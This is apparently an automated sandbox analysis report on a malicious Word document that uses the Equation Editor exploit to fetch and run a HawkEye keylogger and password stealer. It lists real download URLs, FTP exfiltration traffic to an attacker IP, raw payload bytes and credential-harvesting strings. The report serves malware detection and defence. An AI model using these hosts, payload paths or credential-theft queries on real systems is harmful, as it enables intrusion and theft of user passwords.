Windows Analysis Report 280072109764552.doc

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: 280072109764552.doc

Avira: detected

Found malware configuration

Source: name.exe.1776.4.memstr

Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\name.exe	ReversingLabs: Detection: 13%

Multi AV Scanner detection for submitted file

Source: 280072109764552.doc

ReversingLabs: Detection: 31%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\name.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.InstallUtil.exe.400000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 5.2.InstallUtil.exe.400000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 4.2.name.exe.3682b02.11.unpack	Avira: Label: TR/Inject.vcoldi
Source: 4.2.name.exe.3489f22.7.unpack	Avira: Label: TR/Inject.vcoldi

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\name.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\name.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.22:49168 -> 142.250.203.100:443 version: TLS 1.0

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
Source:	Binary string: InstallUtil.pdb source: name.exe, 00000004.00000002.2153168728.0000000006870000.00000004.00000001.sdmp, InstallUtil.exe

Spreading:

May infect USB drives

Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp	Binary or memory string: autorun.inf
Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp	Binary or memory string: [autorun]

Contains functionality to enumerate / list files inside a directory

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,		6_2_00406EC3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,		7_2_00408441
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,		7_2_00407E0E

Enumerates the file system

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\			Jump to behavior

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Roaming\name.exe	Code function: 4x nop then jmp 00349438h		4_2_00348BB7
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001A185D
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001ACC7D
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then call 001A2300h		5_2_001AC8CE
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001AC8CE
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then call 001A2300h		5_2_001AC171
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001AC171
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001AE199
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001A998D
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then jmp 001A2248h		5_2_001A2180
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then call 001A2300h		5_2_001AC9B8
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001AC9B8
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001A0A55
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001AD67E
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001AE32E
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001AD768
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001ACFA1
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001A1BA5
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]		5_2_001AA3C3

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: vecvietnam.com.vn

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 142.250.203.100:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.255.237.180:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.22:49171 -> 45.141.152.18:21

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49172 -> 45.141.152.18:64943

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: ApacheDate: Wed, 28 Jul 2021 15:01:16 GMTContent-Type: application/octet-streamContent-Length: 1383936Last-Modified: Wed, 28 Jul 2021 00:30:49 GMTConnection: keep-aliveETag: "6100a539-151e00"Expires: Fri, 27 Aug 2021 15:01:16 GMTCache-Control: max-age=2592000Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c7 80 a0 3c 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 0a 15 00 00 12 00 00 00 00 00 00 ce 29 15 00 00 20 00 00 00 40 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 29 15 00 4f 00 00 00 00 40 15 00 84 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 09 15 00 00 20 00 00 00 0a 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 0e 00 00 00 40 15 00 00 10 00 00 00 0c 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 15 00 00 02 00 00 00 1c 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 29 15 00 00 00 00 00 48 00 00 00 02 00 05 00 cc 31 14 00 b0 f7 00 00 03 00 02 00 ec 00 00 06 d0 8b 03 00 fa a5 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 4a ec 6a f8 97 e3 ec dd a8 de 31 58 b3 92 bf 6e 7d d6 d1 7c 1a 30 16 5f fe 66 6f 61 b5 17 5e 25 4d d0 96 03 24 43 31 ca 10 70 05 87 34 b9 93 18 8f b3 a1 c5 5d da 81 19 d5 0a f9 30 73 8b 28 90 7f 0c 0b e2 fa bc 49 3a a5 07 6c a8 2a 8e 2b 44 d2 57 d0 01 75 97 c7 71 4e 7c 2c 19 49 00 56 83 48 74 07 27 ae b0 1d d2 6a 67 20 55 6d d7 ed 46 de b4 5d 1c b9 26 1a e6 44 98 93 7d 8f 2f ef a4 b0 e8 60 b5 87 03 95 21 39 fc 96 0e 77 71 04 76 8d e4 3a 94 a1 39 c9 21 59 1f e2 16 1d 9e 43 3a 76 7a a4 84 76 38 be da 1e 3c e1 bc 8f 0c 6f d1 93 1d ee a9 f4 5b 03 76 1e 3f 5b 67 20 7f 04 9a b9 5c 96 fb cb 7e fe 55 26 5e 75 65 57 0d 90 4c ae 10 81 00 af 99 44 1a 77 2e 65 37 dc 56 ba 9e 37 47 02 33 74 72 05 15 1d 99 83 95 e5 9c 1f 11 ad 0e b7 0f fd 04 ea 20 17 7c 84 9d 19 c6 78 ce a3 d5 2d 0f 0a 5d d7 3c 0a 6b e1 15 15 ae 34 d9 0f 53 88 cd 9e ab a0 33 5c e1 1c f7 ed 67 fb 55 21 b4 f1 0f 6f 0f 07 50

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 45.141.152.18 45.141.152.18
Source: Joe Sandbox View	IP Address: 45.141.152.18 45.141.152.18

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View	ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Uses FTP

Source: unknown

FTP traffic detected: 45.141.152.18:21 -> 192.168.2.22:49171 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /xpen3/09867654270721.PDF.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vecvietnam.com.vnConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.22:49168 -> 142.250.203.100:443 version: TLS 1.0

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{238E66D8-299E-4B99-A605-44EE5B79BCDD}.tmp

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /xpen3/09867654270721.PDF.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vecvietnam.com.vnConnection: Keep-Alive

Found strings which match to known social media urls

Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: vecvietnam.com.vn

URLs found in memory or binary data

Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: name.exe, 00000004.00000002.2141473000.0000000000A7C000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmp	String found in binary or memory: http://ftp.vngpack.com
Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp	String found in binary or memory: http://n.f
Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp, name.exe, 00000004.00000002.2150294891.0000000005113000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/s
Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobede
Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ao
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: name.exe, 00000004.00000002.2141909608.0000000002481000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: name.exe, 00000004.00000002.2150758062.0000000005CA0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://whatismyipaddress.com/-
Source: name.exe, 00000004.00000002.2150758062.0000000005CA0000.00000002.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2374162693.00000000081A0000.00000002.00000001.sdmp, vbc.exe, 00000007.00000002.2180304316.00000000028B0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe	String found in binary or memory: http://www.nirsoft.net/
Source: InstallUtil.exe, 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp	String found in binary or memory: http://www.site.com/logs.php
Source: vbc.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: name.exe, 00000004.00000002.2141833047.0000000002441000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/
Source: vbc.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger

Source: Yara match	File source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.409c0d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3688f0a.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.3682b02.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.name.exe.368a90f.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.InstallUtil.exe.2673454.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2147447351.0000000003489000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2365202244.0000000002651000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs

.Net Code: HookKeyboard

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 6_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

6_2_0040AC8A

System Summary:

Malicious sample detected (through community Yara rule)

Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.349032a.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.InstallUtil.exe.408208.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3682b02.11.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3489f22.7.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3489f22.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.name.exe.3491d2f.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
